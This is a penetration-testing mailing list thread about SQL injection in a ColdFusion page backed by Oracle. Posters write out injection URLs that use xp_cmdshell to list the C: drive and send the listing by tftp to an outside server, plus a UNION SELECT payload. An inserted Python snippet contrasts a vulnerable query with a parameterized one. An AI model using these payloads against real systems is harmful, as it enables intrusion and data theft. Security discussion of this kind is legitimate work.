Penetration Testing mailing list archives
RE: CFM SQL injection
From: "Wertheimer, Ishai" <iwertheimer () kpmg com>
Date: Tue, 1 Jan 2002 01:57:06 -0500
Note that the response you got was from an Oracle SQL server, and xp_cmdshell is for MS-SQL Server ... You should better use UNION or the like to get unauthorized data from the database.

Ishai Wertheimer

-----Original Message-----
From: Charlie Liserne [mailto:Chili () SexMagnet com]
Sent: Monday, December 24, 2001 9:14 PM
To: pen-test () security-focus com
Subject: Re: CFM SQL injection

Hi,

I'm trying to get the C:/ directory, but I'm not able to do that. This is a non-intrusive pen-test, so I wouldn't like to have to exec something like:

http://www.server.com/page.cfm?page_id=9999; EXEC master..xp_cmdshell 'dir *.* > c:\listing.txt' --'
http://www.server.com/page.cfm?page_id=9999; EXEC master..xp_cmdshell 'tftp listing.txt my.server' --'

I would like to get a listing of the c: directory in a clean way, without writing to disk, and get the results appearing in my web browser. I know some column names, but I can't figure out how it could be possible to read or modify it.

Also, I'm not able to get a list of the directory; the ' escape character isn't necessary, but when I do:

http://www.server.es/page.cfm?page_id=12; EXEC master..xp_cmdshell 'dir';

The response is:

ODBC Error Code = S1000 (General error)
[Oracle][ODBC][Ora]ORA-00911: invalid character

Where is the invalid character?? How could it be possible to take advantage of a ColdFusion programming error? Some time ago, a message from Rick Redman (Minga) appeared on this mailing list, speaking about how easy it is to break into a ColdFusion app if the programmer isn't 100% trained in secure coding practices. I was searching on the Internet about this, and how to take advantage of the programming errors, but I can't figure out how to pervert a cfm application. Do you know if there are any documents about this?

Best Regards,
Charlie.

*********** REPLY SEPARATOR ***********
It looks like the query that you're attacking isn't prepending and appending quotes to your input. The string build probably looks a lil' sumthin' like this:

Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = " & strPageID

This means that there is no need to use quotes in order to perform a successful injection. So, try something like this:

http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM OtherTable WHERE 1=1

Hopefully this will return an error complaining about an invalid table name, or at least another error that may give you a better idea of what the web application is doing with your argument.
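The string build quoted above (a numeric page_id spliced unquoted into the WHERE clause) next to its fix, as an added example that is not part of this thread. It uses Python's sqlite3 with a constructed two-table schema in place of the ColdFusion/Oracle setup; the bound-parameter version stands in for what ColdFusion's cfqueryparam does.

```python
import sqlite3


def build_db():
    """Constructed sample schema: a pages table and a second table an
    injected UNION could pull rows from."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages(page_id INTEGER, title TEXT);
        INSERT INTO pages VALUES (12, 'Home');
        CREATE TABLE users(username TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', 'constructed-hash');
    """)
    return conn


def lookup_vulnerable(conn, page_id):
    """Mirrors the string build from the thread: the argument is concatenated
    with no surrounding quotes, so no quote character is needed to inject."""
    sql = "SELECT title FROM pages WHERE page_id = " + page_id
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, page_id):
    """Hardened form: validate the type, then bind the value as a parameter.
    The argument never becomes part of the SQL text, so a UNION appended to
    it is rejected at the int() check rather than executed."""
    try:
        pid = int(page_id)
    except ValueError:
        return []
    rows = conn.execute("SELECT title FROM pages WHERE page_id = ?", (pid,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = build_db()
    payload = "9999 UNION SELECT password_hash FROM users WHERE 1=1"
    print("concatenated:", lookup_vulnerable(db, payload))   # leaks users row
    print("parameterized:", lookup_parameterized(db, payload))  # []
```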
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/